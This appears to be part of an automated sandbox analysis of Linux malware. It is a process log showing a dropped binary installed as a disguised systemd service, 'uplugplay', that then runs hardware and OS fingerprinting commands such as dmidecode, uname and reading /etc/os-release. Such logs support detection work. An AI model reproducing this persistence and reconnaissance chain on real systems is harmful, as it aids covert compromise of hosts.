                                                                                      Arguments:sh -c "systemctl enable uplugplay.service"
                                                                                      File size:129816 bytes
                                                                                      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                      Start time:00:07:14
                                                                                      Start date:26/01/2022
                                                                                      Path:/bin/sh
                                                                                      Arguments:n/a
                                                                                      File size:129816 bytes
                                                                                      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                      Start time:00:07:14
                                                                                      Start date:26/01/2022
                                                                                      Path:/usr/bin/systemctl
                                                                                      Arguments:systemctl enable uplugplay.service
                                                                                      File size:996584 bytes
                                                                                      MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                                                                                      Start time:00:07:16
                                                                                      Start date:26/01/2022
                                                                                      Path:/tmp/lHxDIlc6HU
                                                                                      Arguments:n/a
                                                                                      File size:426540 bytes
                                                                                      MD5 hash:06beb198dd8d97ce7673d6c99c4c9ac4

                                                                                      Start time:00:07:16
                                                                                      Start date:26/01/2022
                                                                                      Path:/bin/sh
                                                                                      Arguments:sh -c "systemctl start uplugplay.service"
                                                                                      File size:129816 bytes
                                                                                      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                      Start time:00:07:16
                                                                                      Start date:26/01/2022
                                                                                      Path:/bin/sh
                                                                                      Arguments:n/a
                                                                                      File size:129816 bytes
                                                                                      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                      Start time:00:07:16
                                                                                      Start date:26/01/2022
                                                                                      Path:/usr/bin/systemctl
                                                                                      Arguments:systemctl start uplugplay.service
                                                                                      File size:996584 bytes
                                                                                      MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                                                                                      Start time:00:07:13
                                                                                      Start date:26/01/2022
                                                                                      Path:/usr/lib/systemd/systemd
                                                                                      Arguments:n/a
                                                                                      File size:1620224 bytes
                                                                                      MD5 hash:9b2bec7092a40488108543f9334aab75

                                                                                      Start time:00:07:13
                                                                                      Start date:26/01/2022
                                                                                      Path:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                                                                                      Arguments:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                                                                                      File size:22760 bytes
                                                                                      MD5 hash:3633b075f40283ec938a2a6a89671b0e

                                                                                      Start time:00:07:16
                                                                                      Start date:26/01/2022
                                                                                      Path:/usr/lib/systemd/systemd
                                                                                      Arguments:n/a
                                                                                      File size:1620224 bytes
                                                                                      MD5 hash:9b2bec7092a40488108543f9334aab75

                                                                                      Start time:00:07:16
                                                                                      Start date:26/01/2022
                                                                                      Path:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                                                                                      Arguments:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                                                                                      File size:22760 bytes
                                                                                      MD5 hash:3633b075f40283ec938a2a6a89671b0e

                                                                                      Start time:00:07:17
                                                                                      Start date:26/01/2022
                                                                                      Path:/usr/lib/systemd/systemd
                                                                                      Arguments:n/a
                                                                                      File size:1620224 bytes
                                                                                      MD5 hash:9b2bec7092a40488108543f9334aab75

                                                                                      Start time:00:07:17
                                                                                      Start date:26/01/2022
                                                                                      Path:/usr/sbin/uplugplay
                                                                                      Arguments:/usr/sbin/uplugplay
                                                                                      File size:426540 bytes
                                                                                      MD5 hash:06beb198dd8d97ce7673d6c99c4c9ac4

                                                                                      Start time:00:07:17
                                                                                      Start date:26/01/2022
                                                                                      Path:/usr/sbin/uplugplay
                                                                                      Arguments:n/a
                                                                                      File size:426540 bytes
                                                                                      MD5 hash:06beb198dd8d97ce7673d6c99c4c9ac4

                                                                                      Start time:00:07:18
                                                                                      Start date:26/01/2022
                                                                                      Path:/usr/sbin/uplugplay
                                                                                      Arguments:n/a
                                                                                      File size:426540 bytes
                                                                                      MD5 hash:06beb198dd8d97ce7673d6c99c4c9ac4

                                                                                      Start time:00:07:18
                                                                                      Start date:26/01/2022
                                                                                      Path:/bin/sh
                                                                                      Arguments:sh -c "/usr/sbin/uplugplay -Dcomsvc"
                                                                                      File size:129816 bytes
                                                                                      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                      Start time:00:07:18
                                                                                      Start date:26/01/2022
                                                                                      Path:/bin/sh
                                                                                      Arguments:n/a
                                                                                      File size:129816 bytes
                                                                                      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                      Start time:00:07:18
                                                                                      Start date:26/01/2022
                                                                                      Path:/usr/sbin/uplugplay
                                                                                      Arguments:/usr/sbin/uplugplay -Dcomsvc
                                                                                      File size:426540 bytes
                                                                                      MD5 hash:06beb198dd8d97ce7673d6c99c4c9ac4

                                                                                      Start time:00:07:22
                                                                                      Start date:26/01/2022
                                                                                      Path:/usr/sbin/uplugplay
                                                                                      Arguments:n/a
                                                                                      File size:426540 bytes
                                                                                      MD5 hash:06beb198dd8d97ce7673d6c99c4c9ac4

                                                                                      Start time:00:07:22
                                                                                      Start date:26/01/2022
                                                                                      Path:/bin/sh
                                                                                      Arguments:sh -c "cat /proc/cpuinfo"
                                                                                      File size:129816 bytes
                                                                                      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                      Start time:00:07:22
                                                                                      Start date:26/01/2022
                                                                                      Path:/bin/sh
                                                                                      Arguments:n/a
                                                                                      File size:129816 bytes
                                                                                      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                      Start time:00:07:22
                                                                                      Start date:26/01/2022
                                                                                      Path:/usr/bin/cat
                                                                                      Arguments:cat /proc/cpuinfo
                                                                                      File size:43416 bytes
                                                                                      MD5 hash:7e9d213e404ad3bb82e4ebb2e1f2c1b3

                                                                                      Start time:00:07:22
                                                                                      Start date:26/01/2022
                                                                                      Path:/usr/sbin/uplugplay
                                                                                      Arguments:n/a
                                                                                      File size:426540 bytes
                                                                                      MD5 hash:06beb198dd8d97ce7673d6c99c4c9ac4

                                                                                      Start time:00:07:22
                                                                                      Start date:26/01/2022
                                                                                      Path:/bin/sh
                                                                                      Arguments:sh -c "dmidecode --type baseboard"
                                                                                      File size:129816 bytes
                                                                                      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                      Start time:00:07:22
                                                                                      Start date:26/01/2022
                                                                                      Path:/bin/sh
                                                                                      Arguments:n/a
                                                                                      File size:129816 bytes
                                                                                      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                      Start time:00:07:22
                                                                                      Start date:26/01/2022
                                                                                      Path:/usr/sbin/dmidecode
                                                                                      Arguments:dmidecode --type baseboard
                                                                                      File size:121856 bytes
                                                                                      MD5 hash:37284ba29446fb2dadf1ce80f8139c1a

                                                                                      Start time:00:07:23
                                                                                      Start date:26/01/2022
                                                                                      Path:/usr/sbin/uplugplay
                                                                                      Arguments:n/a
                                                                                      File size:426540 bytes
                                                                                      MD5 hash:06beb198dd8d97ce7673d6c99c4c9ac4

                                                                                      Start time:00:07:23
                                                                                      Start date:26/01/2022
                                                                                      Path:/bin/sh
                                                                                      Arguments:sh -c "dmidecode --type baseboard"
                                                                                      File size:129816 bytes
                                                                                      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                      Start time:00:07:23
                                                                                      Start date:26/01/2022
                                                                                      Path:/bin/sh
                                                                                      Arguments:n/a
                                                                                      File size:129816 bytes
                                                                                      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                      Start time:00:07:23
                                                                                      Start date:26/01/2022
                                                                                      Path:/usr/sbin/dmidecode
                                                                                      Arguments:dmidecode --type baseboard
                                                                                      File size:121856 bytes
                                                                                      MD5 hash:37284ba29446fb2dadf1ce80f8139c1a

                                                                                      Start time:00:07:23
                                                                                      Start date:26/01/2022
                                                                                      Path:/usr/sbin/uplugplay
                                                                                      Arguments:n/a
                                                                                      File size:426540 bytes
                                                                                      MD5 hash:06beb198dd8d97ce7673d6c99c4c9ac4

                                                                                      Start time:00:07:23
                                                                                      Start date:26/01/2022
                                                                                      Path:/bin/sh
                                                                                      Arguments:sh -c "dmidecode --type baseboard"
                                                                                      File size:129816 bytes
                                                                                      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                      Start time:00:07:23
                                                                                      Start date:26/01/2022
                                                                                      Path:/bin/sh
                                                                                      Arguments:n/a
                                                                                      File size:129816 bytes
                                                                                      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                      Start time:00:07:23
                                                                                      Start date:26/01/2022
                                                                                      Path:/usr/sbin/dmidecode
                                                                                      Arguments:dmidecode --type baseboard
                                                                                      File size:121856 bytes
                                                                                      MD5 hash:37284ba29446fb2dadf1ce80f8139c1a

                                                                                      Start time:00:07:24
                                                                                      Start date:26/01/2022
                                                                                      Path:/usr/sbin/uplugplay
                                                                                      Arguments:n/a
                                                                                      File size:426540 bytes
                                                                                      MD5 hash:06beb198dd8d97ce7673d6c99c4c9ac4

                                                                                      Start time:00:07:24
                                                                                      Start date:26/01/2022
                                                                                      Path:/bin/sh
                                                                                      Arguments:sh -c "dmidecode --type baseboard"
                                                                                      File size:129816 bytes
                                                                                      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                      Start time:00:07:24
                                                                                      Start date:26/01/2022
                                                                                      Path:/bin/sh
                                                                                      Arguments:n/a
                                                                                      File size:129816 bytes
                                                                                      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                      Start time:00:07:24
                                                                                      Start date:26/01/2022
                                                                                      Path:/usr/sbin/dmidecode
                                                                                      Arguments:dmidecode --type baseboard
                                                                                      File size:121856 bytes
                                                                                      MD5 hash:37284ba29446fb2dadf1ce80f8139c1a

                                                                                      Start time:00:07:24
                                                                                      Start date:26/01/2022
                                                                                      Path:/usr/sbin/uplugplay
                                                                                      Arguments:n/a
                                                                                      File size:426540 bytes
                                                                                      MD5 hash:06beb198dd8d97ce7673d6c99c4c9ac4

                                                                                      Start time:00:07:24
                                                                                      Start date:26/01/2022
                                                                                      Path:/bin/sh
                                                                                      Arguments:sh -c "dmidecode --type baseboard"
                                                                                      File size:129816 bytes
                                                                                      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                      Start time:00:07:24
                                                                                      Start date:26/01/2022
                                                                                      Path:/bin/sh
                                                                                      Arguments:n/a
                                                                                      File size:129816 bytes
                                                                                      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                      Start time:00:07:24
                                                                                      Start date:26/01/2022
                                                                                      Path:/usr/sbin/dmidecode
                                                                                      Arguments:dmidecode --type baseboard
                                                                                      File size:121856 bytes
                                                                                      MD5 hash:37284ba29446fb2dadf1ce80f8139c1a

                                                                                      Start time:00:07:24
                                                                                      Start date:26/01/2022
                                                                                      Path:/usr/sbin/uplugplay
                                                                                      Arguments:n/a
                                                                                      File size:426540 bytes
                                                                                      MD5 hash:06beb198dd8d97ce7673d6c99c4c9ac4

                                                                                      Start time:00:07:24
                                                                                      Start date:26/01/2022
                                                                                      Path:/bin/sh
                                                                                      Arguments:sh -c "dmidecode --type baseboard"
                                                                                      File size:129816 bytes
                                                                                      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                      Start time:00:07:24
                                                                                      Start date:26/01/2022
                                                                                      Path:/bin/sh
                                                                                      Arguments:n/a
                                                                                      File size:129816 bytes
                                                                                      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                      Start time:00:07:24
                                                                                      Start date:26/01/2022
                                                                                      Path:/usr/sbin/dmidecode
                                                                                      Arguments:dmidecode --type baseboard
                                                                                      File size:121856 bytes
                                                                                      MD5 hash:37284ba29446fb2dadf1ce80f8139c1a

                                                                                      Start time:00:07:24
                                                                                      Start date:26/01/2022
                                                                                      Path:/usr/sbin/uplugplay
                                                                                      Arguments:n/a
                                                                                      File size:426540 bytes
                                                                                      MD5 hash:06beb198dd8d97ce7673d6c99c4c9ac4

                                                                                      Start time:00:07:24
                                                                                      Start date:26/01/2022
                                                                                      Path:/bin/sh
                                                                                      Arguments:sh -c dmidecode
                                                                                      File size:129816 bytes
                                                                                      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                      Start time:00:07:24
                                                                                      Start date:26/01/2022
                                                                                      Path:/bin/sh
                                                                                      Arguments:n/a
                                                                                      File size:129816 bytes
                                                                                      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                      Start time:00:07:24
                                                                                      Start date:26/01/2022
                                                                                      Path:/usr/sbin/dmidecode
                                                                                      Arguments:dmidecode
                                                                                      File size:121856 bytes
                                                                                      MD5 hash:37284ba29446fb2dadf1ce80f8139c1a

                                                                                      Start time:00:07:25
                                                                                      Start date:26/01/2022
                                                                                      Path:/usr/sbin/uplugplay
                                                                                      Arguments:n/a
                                                                                      File size:426540 bytes
                                                                                      MD5 hash:06beb198dd8d97ce7673d6c99c4c9ac4

                                                                                      Start time:00:07:25
                                                                                      Start date:26/01/2022
                                                                                      Path:/bin/sh
                                                                                      Arguments:sh -c "cat /etc/os-release"
                                                                                      File size:129816 bytes
                                                                                      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                      Start time:00:07:26
                                                                                      Start date:26/01/2022
                                                                                      Path:/bin/sh
                                                                                      Arguments:n/a
                                                                                      File size:129816 bytes
                                                                                      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                      Start time:00:07:26
                                                                                      Start date:26/01/2022
                                                                                      Path:/usr/bin/cat
                                                                                      Arguments:cat /etc/os-release
                                                                                      File size:43416 bytes
                                                                                      MD5 hash:7e9d213e404ad3bb82e4ebb2e1f2c1b3

                                                                                      Start time:00:07:26
                                                                                      Start date:26/01/2022
                                                                                      Path:/usr/sbin/uplugplay
                                                                                      Arguments:n/a
                                                                                      File size:426540 bytes
                                                                                      MD5 hash:06beb198dd8d97ce7673d6c99c4c9ac4

                                                                                      Start time:00:07:26
                                                                                      Start date:26/01/2022
                                                                                      Path:/bin/sh
                                                                                      Arguments:sh -c uptime
                                                                                      File size:129816 bytes
                                                                                      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                      Start time:00:07:26
                                                                                      Start date:26/01/2022
                                                                                      Path:/bin/sh
                                                                                      Arguments:n/a
                                                                                      File size:129816 bytes
                                                                                      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                      Start time:00:07:26
                                                                                      Start date:26/01/2022
                                                                                      Path:/usr/bin/uptime
                                                                                      Arguments:uptime
                                                                                      File size:14568 bytes
                                                                                      MD5 hash:3ad70d8e33316ac713bf25c2ddf2fb14

                                                                                      Start time:00:07:26
                                                                                      Start date:26/01/2022
                                                                                      Path:/usr/sbin/uplugplay
                                                                                      Arguments:n/a
                                                                                      File size:426540 bytes
                                                                                      MD5 hash:06beb198dd8d97ce7673d6c99c4c9ac4

                                                                                      Start time:00:07:26
                                                                                      Start date:26/01/2022
                                                                                      Path:/bin/sh
                                                                                      Arguments:sh -c "uname -a"
                                                                                      File size:129816 bytes
                                                                                      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                      Start time:00:07:26
                                                                                      Start date:26/01/2022
                                                                                      Path:/bin/sh
                                                                                      Arguments:n/a
                                                                                      File size:129816 bytes
                                                                                      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                      Start time:00:07:26
                                                                                      Start date:26/01/2022
                                                                                      Path:/usr/bin/uname
                                                                                      Arguments:uname -a
                                                                                      File size:39288 bytes
                                                                                      MD5 hash:4ac7c634c5bec95753c480e9d421dcc2